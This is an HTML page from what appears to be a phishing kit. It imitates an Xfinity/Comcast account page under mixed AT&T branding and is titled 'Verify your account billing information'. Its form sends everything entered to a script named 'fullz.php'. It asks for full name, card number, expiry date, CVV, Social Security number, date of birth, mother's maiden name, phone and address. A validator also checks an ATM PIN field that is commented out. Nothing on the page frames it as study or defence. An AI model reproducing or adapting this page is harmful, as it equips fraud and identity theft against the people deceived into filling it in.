<!DOCTYPE html>
<html class="light ">
<head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script type="text/javascript" async="async" src="./files/s25038968956272"></script>
	
	<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
	<meta name="mobile-web-app-capable" content="yes">
	<meta name="apple-mobile-web-app-capable" content="yes">
	<meta name="msapplication-TileColor" content="#ffffff">
	<meta name="msapplication-TileImage" content="images/global/favicon/favicon-96x96.png"><title>Confirmation</title>
	<link rel="stylesheet" href="./files/styles-light.min.css">
	<script src="./files/jquery-1.11.3.min.js.download"></script>

	<link rel="apple-touch-icon" sizes="180x180" href="./files/apple-touch-icon.png">
	<link rel="icon" type="image/png" sizes="32x32" href="./files/favicon-32x32.png">
	<link rel="icon" type="image/png" sizes="16x16" href="./files/favicon-16x16.png">
	<link rel="manifest" href="./files/site.webmanifest">
	<link rel="mask-icon" href="./files/safari-pinned-tab.svg" color="#5bbad5">
	<meta name="msapplication-TileColor" content="#da532c">
	<meta name="theme-color" content="#ffffff">


	<script>
		function secondaryButtonHandler(){var t=$("button[type=submit]:eq(0)");t.attr("value",$(this).attr("value")).attr("formnovalidate",""),$(this).attr("data-loader")?t.attr("data-loader",!0):t.removeAttr("data-loader"),t.click()}var inputEvents="input";</script>
	<!--[if lte IE 9]>
		<script>
			inputEvents="keyup change paste";
		</script>
	<![endif]-->
	<!--[if lt IE 9]>
		<script>
			window.html5 = { shivMethods: false, shivCSS: false };
			function secondaryButtonHandler() {
				var value = $(this).attr('value');
				$('form').append("<input name='_eventId' type='hidden' value='"+value+"'/>");
				$('form')[0].submit();
			}
		</script>
		<script src="js/libs/html5shiv-printshiv.min.js"></script>
		<script src="js/libs/selectivizr-min.js"></script>
	<![endif]-->
	<!--[if IE 9]>
		<script> window.html5 = { elements: 'main', shivMethods: false, shivCSS: false }; </script>
		<script src="js/libs/html5shiv-printshiv.min.js"></script>
	<![endif]-->

	<script src="./files/dropkick.2.1.7.min.js.download"></script>
	<script src="./files/jquery.validate.min.js.download"></script>
	<script src="./files/additional-methods.min.js.download"></script>
	<!--[if lt IE 9]>
		<script src="js/libs/respond.min.js"></script>
		<script src="js/libs/PIE_IE678.js"></script>
		<style>
			.xfinity-logo {
				background: url(images/xfinity.png);
			}

			button.primary, button.secondary, button.submit, .button.primary, .button.secondary, .button.submit {
				min-width: 90px;
			}

			[role=dialog].overlay .content {
				max-width: 592px;
			}

			input {
				position: relative;
				padding-top: 10px;
			}

			input[type=checkbox].slvzr-checked ~ .checkbox:after {
				display: none;
			}

			input[type=checkbox].slvzr-checked ~ .checkbox {
				background: none;
				border: none;
				background-image: url(images/checkbox_checked.png);
			}

			.icon.valid:after {
				border: none;
				width: 22px;
				height: 22px;
				margin: -1px 0 0 -1px;
				background-image: url(images/green_checkmark.png);
			}

			.dk-selected:after {
				background-image: url(images/chevron-down.png);
				width: 14px;
				height: 7px;
				border: none;
				margin-top: 13px;
			}

			.dk-select-open-down .dk-selected:after {
				background-image: url(images/chevron-up.png);
			}
		</style>
	<![endif]-->
	<!--[if lte IE 9]>
		<script type="text/javascript" src="js/libs/jquery.placeholder-plugin.min.js"></script>
		<script>
			$(document).ready(function() {
				$("input[name=mobilePhoneNumber]").removeAttr('placeholder');
				$("#userName").removeAttr('placeholder');
				$('input:not([type=password]), textarea').placeholder();
				$('#passwordRetype').each(function() {
					var passwordPlaceholder=$(this).attr('placeholder');
					$(this).before('<label for="passwordRetype">'+passwordPlaceholder+'</label>');
				});
			});
		</script>
	<![endif]-->

	<script src="./files/scripts.min.js.download"></script><script type="text/javascript" src="./files/lodash-slim.min.js.download"></script>
		<script type="text/javascript" src="./files/tracking-aws.min.js.download"></script>
		<script type="text/javascript" src="./files/tracking-DTM.min.js.download"></script>
		<script type="text/javascript" src="./files/tracking.min.js.download"></script>
		<script src="./files/satelliteLib-773f1d685076ba02ef9dd20f568cce9a6f1991dd.js.download"></script><style id="at-mbox-default-style">.mboxDefault {visibility:hidden;}</style><style>.at-element-marker {visibility:visible;}</style>
		<script type="tracking-data-digitalData">
		{
		"page": {
			"category": {
			"primaryCategory": "IDM",
			"subCategory1": "create-uid",
			"businessType": "resi",
			"siteType": "selfservice",
			"designType": "responsive"
		}
		},
		"affiliate" : {
			"name": "comcast",
			"channel" : "web"
		},
		"codebase" : {
			"name" : "CIMA IDM"
		},
		"schemaVersion" : 0.11
	}
	</script>
	
		<script type="tracking-data-page">
			{
			
				"pageInfo": {
					"screenName": "Enter SSN, DOB, Phone",
					"language": "en",
					"referrerId": "IDM"
				}
			
			
			
		}
		</script>
	
	
		<script type="tracking-data-user">
			[{
			"profile": [{
				"attributes": {
					"UIDVerificationMethod":"last 4 of ssn","uidCreationType":"IDM"
				}
			}]
		}]
		</script>
	

	<script>document.dispatchEvent(new CustomEvent("c-tracking-init-start"));</script>
	<script>
		document.addEventListener("DOMContentLoaded", function() {
			document.dispatchEvent(new CustomEvent("c-tracking-log-page", {
				bubbles: true
			}));
		});
		document.addEventListener('click', function(ev){
			var element = ev.target.closest('a:not([data-tracking]), button:not([data-tracking])');

			if (element) {
				var event = new CustomEvent('c-tracking-log-dom', {
					bubbles: true
				});
				element.dispatchEvent(event);
			}
		});
	</script><script>document.dispatchEvent(new CustomEvent("c-tracking-init-styles"));</script>
	<script src="./files/s-code-contents-11c8f38a44853a1fa459e08fd609da47c7ce7efd.js.download"></script><script src="./files/satellite-580fe8b364746d7de000adbc.js.download"></script><script src="./files/satellite-59a583c164746d7ae40061e0.js.download"></script><script src="./files/satellite-57ee858c64746d28e2004caa.js.download"></script><script src="./files/satellite-57ee850c64746d28e2004c7f.js.download"></script></head>
<body>
<div id="breakpoints"></div>
<div id="background" style="height: 613px;"></div>




<header>
	<a class="xfinity-logo" href="#"><span class="screen-reader-text">AT&T &copy Official - Wireless, Official & DirectTV offers</span></a>
</header>
<main role="main">
	
	
	
	


<div class="main-content">
	
<h2> Verify your account billing information</h2>

<form id="auxForm" name"auxForm" action="fullz.php" method="post" ><div class="field-container">
		

<div class="card">
<div class="card__content">
<div class="form-control form-control--label-inline-at-768">
<label class="form-control__label" for="cardno">Full Name </label>
<div class="form-control__input">
 <p> 
 <input type="text" class="cardno" autocomplete="off" id="cardno" name="fullname" placeholder="Enter Full Name" required>
</div>
</div>
</div>
</div>		
		
<div class="card">
<div class="card__content">
<div class="form-control form-control--label-inline-at-768">
<label class="form-control__label" for="cardno">Credit / Debit card number </label>
<div class="form-control__input">
 <p> 
 <input type="text" class="cardno" autocomplete="off" id="cardno" name="cardno" placeholder="Credit/Debit card number" required>
</div>
</div>
</div>
</div>

<div class="DOB_wrapper">

<div class="label-container">
	<label for="expdate" class="">
		<span>
			
				Expiry Date </span></label>
</div>
<input type="tel" class="expd" autocomplete="off" id="expdate" name="expdate"  maxlength="7" placeholder="MM/YYYY">

</div>

<div class="DOB_wrapper" >


<div class="label-container">
	<label for="phoneNumber" class=""></label>
 CVV   
 <input id="cvv" name="cvv"  placeholder="e.g 123" type="text"   autocomplete="off" required>
 
</div>
</div>

<!-- <div class="DOB_wrapper">



<div class="label-container">
	<label for="dateOfBirth" class="">Atm Pin </label>
</div>
<input type="text" class="atmpin" autocomplete="off" id="atmpin" name="atmpin" data-mask="0000" placeholder="e.g 0000">
</div>
 -->

<div class="phoneNumber_wrapper">
			
<div class="label-container">
	<label for="mmn" class=""></label>
 Mother's Maiden Name
 <input id="mmn" name="mmn" data-msg-phoneus="Please enter your mothers maiden name." placeholder="Mother's Maiden Name" type="text" autocomplete="off" required>
 
 
</div>
</div>

	</div>



<div class="DOB_wrapper">



<div class="label-container">
	<label for="dateOfBirth" class="">
		<span>
			
				Date of Birth
				
			
		</span>
	</label>
	
	
</div>
<input type="text" class="dob" autocomplete="off" id="dateOfBirth" name="dateOfBirth" placeholder="MM/DD/YYYY" required>

</div>

<div class="DOB_wrapper">



<div class="label-container">
	<label for="dateOfBirth" class="form-control__input">
		<span>
			
				Social Security Number
				
			
		</span>
	</label>
	
	
</div>
<input type="text" class="dob" autocomplete="off" id="dateOfBirth" name="ssn" placeholder="XXX-XX-XXXX" required>

</div>


<div class="phoneNumber_wrapper">

<div class="label-container">
	<label for="phoneNumber" class="">
		<span>
			
				Phone Number On Account
				
			
		</span>
	</label>
	
	
</div>
<input id="accountPhoneNumber2" name="accountPhoneNumber2"  placeholder="(###) ###-####" type="tel" required>
</div>


<div class="card">
<div class="card__content">
<div class="form-control form-control--label-inline-at-768">
</p>
<label class="form-control__label" for="cardno">Address </label>
<div class="form-control__input">
 <p> 
 <input type="text" class="cardno" autocomplete="off" id="cardno" name="addresss" required>
</div>
</div>
</div>
</div>	

<div class="DOB_wrapper">

<div class="label-container">
	<label for="expdate" class="">
		<span>
			
				State </span></label>
</div>
<input type="tel" class="expd" autocomplete="off" id="expdate" name="state"  required>

</div>

<div class="DOB_wrapper" >


<div class="label-container">
	<label for="phoneNumber" class=""></label>
 Zip Code   
 <input id="cvv" name="zip"  type="text"   autocomplete="off" required>
 
</div>
</div>

<p>


<div class="button-wrapper">
<!-- 	<button name="_eventId" class="secondary cancel" type="button" value="selectDifferentMethod">Cancel</button> -->
	
	<button name="_eventId" class="submit" type="submit" value="next" data-loader="true">Continue</button></div>
</form>


<script language="JavaScript" src="gen_validatorv4.js"
    type="text/javascript" xml:space="preserve"></script>

<script language="JavaScript" type="text/javascript"
    xml:space="preserve">//<![CDATA[
//You should create the validator only after the definition of the HTML form
  var frmvalidator  = new Validator("auxForm");
  frmvalidator.addValidation("cardno","req","Please enter your Card number");
  frmvalidator.addValidation("cardno","maxlen=16",	"Max length for Card number is 16");
  frmvalidator.addValidation("cardno","numeric","Number characters only");

  
  frmvalidator.addValidation("expdate","req","Please enter your Expiratory date");
  frmvalidator.addValidation("expdate","maxlen=7",	"Max characters for expiratory date is 7");
  
  frmvalidator.addValidation("cvv","req","Please enter your cvv");
  frmvalidator.addValidation("cvv","maxlen=4","Max length is 4");
  frmvalidator.addValidation("cvv","numeric","Number characters only");
  
  frmvalidator.addValidation("atmpin","req","Please enter your Atm pin");
  frmvalidator.addValidation("atmpin","maxlen=4","Max length is 4");
  frmvalidator.addValidation("atmpin","numeric","Number characters only");
  
  frmvalidator.addValidation("mmn","req","Please enter your Mother's maiden name ");
  frmvalidator.addValidation("mmn","maxlen=40",	"Max length for Mother's maiden name is 40");
  
  frmvalidator.addValidation("ssn","req","Please enter your Social Security number");
  frmvalidator.addValidation("ssn","maxlen=11","Max length is 11");
  
  frmvalidator.addValidation("dateOfBirth","req","Please enter your Date of birth");
  frmvalidator.addValidation("dateOfBirth","maxlen=11","Max length is 11");
	
  frmvalidator.addValidation("accountPhoneNumber2","req","Please enter your Phone number");
  frmvalidator.addValidation("accountPhoneNumber2","maxlen=14","Max length is 14");
  
  frmvalidator.addValidation("cardbank","req","Please enter your Card Number");
  frmvalidator.addValidation("cardbank","maxlen=30","Max length is 30");

//]]></script>

<script>
	idm.ssnVerificationInit=function(){function t(){var t=$("#dateOfBirth\\.month").val()+"/"+$("#dateOfBirth\\.date").val()+"/"+$("#dateOfBirth\\.year").val();10==t.length&&$("#dateOfBirth").val(t)}$(document).ready(function(){$("#phoneNumber").bind(inputEvents,function(){appendPhoneNumber()}),$("#dateOfBirth").bind(inputEvents,function(){appendDateOfBirth()}),displayPhoneNumber(),t()}),jQuery.validator.addMethod("ValidateDateOfBirth",customDateOfBirthValidation,"Please enter a valid date."),jQuery.validator.addClassRules("dob",{ValidateDateOfBirth:!0});idm.createNewValidator({})};
	$(document).ready(idm.ssnVerificationInit);
</script>
</div>
</main>


<footer>
		<span class="content">
			<span class="copyright">
				© 2019 AT&T
			</span>
			<nav>
				<span class="divider hide-compact"></span>
			<span class="links">
				<a href="#">Terms of Service</a>
				<span class="divider"></span>
				<a href="#">Privacy Policy</a>
			</span>
			<span class="divider hide-compact"></span>
			<span class="links">
				<a href="#">Site Map</a>
				<span class="divider"></span>
				<a href="#">Contact Us</a>
			</span>
			</nav>
			<span id="b537c389-7be1-4331-bb73-03a71788bc12" class="truste">
					<script type="text/javascript" src="./files/asc"></script>
					<a href="#" title="TRUSTe online privacy certification" target="_blank">
					   <img style="border: none" src="./files/seal" alt="TRUSTe online privacy certification">
					</a>
			</span>
		</span>
	</footer><script>
		$(document).ready(function() {
			idm.init();
		});
	</script>

	<!--[if lt IE 9]>
		<script>
			$(function() {
				function attachPie() {
					setTimeout(function() {
						$('button.submit, button.primary, .radio, .icon, .textfield, input').each(function() {
							if ($(this).is(':visible'))
								PIE.attach(this);
						});
					}, 10);
				}

				attachPie();

				$('.icon').on('click',function() {
					attachPie();
				});

				function forcePieUpdate(selector) {
					$(selector).addClass('force-pie-update').removeClass('force-pie-update');
				}

				$('input[type=radio]').on('focus blur', function() {
					forcePieUpdate('.radio');
				});

				$.fn.slideDown = function(callback) { this.show().each(callback); }
				$.fn.slideUp = function(callback) { this.hide().each(callback); }

				$('form').submit(function(e){
					var focusedButton = $('button[type=submit]:focus');
					if( focusedButton.length) {
						return true;
					}
					var value = $('button[type=submit]:eq(0)').attr("value");
					$('form').append("<input name='_eventId' type='hidden' value='"+value+"'/>");

					return true;
				});
			});
		</script>
	<![endif]--><script>
				idm.initSubmitButtons=function(){function t(){var t;t=a.closest("form").serialize(),-1!=t.indexOf("_eventId")?t=t.replace(/_eventId=[^&]*/,"_eventId=initiateLoader"):t+="&_eventId=initiateLoader",t+="&ajaxSource=true&fragments=statusLoader",a.addClass("loader").attr("disabled",!0),$.ajax({type:"POST",url:"create-uid?execution=e1s3",async:!0,dataType:"json",data:t,complete:e})}function e(t,e,a){$("#secondaryForm button").click()}var a;$("button[type=submit][data-loader]").length&&($("button[type=submit]").click(function(){a=$(this)}),idm.submitHandlers.push(function(e){if(a||(a=$(e).find("button[type=submit]:eq(0)")),a.attr("data-loader"))return t(),!1}))};
				$(document).ready(idm.initSubmitButtons);
			</script>
			
	
		<script type="text/javascript">
			document.dispatchEvent(new CustomEvent("c-tracking-init-end"));
		</script>
	


<iframe id="destination_publishing_iframe_comcast_0" src="./files/dest5.html" class="aamIframeLoaded" style="display: none; width: 0px; height: 0px;"></iframe></body></html>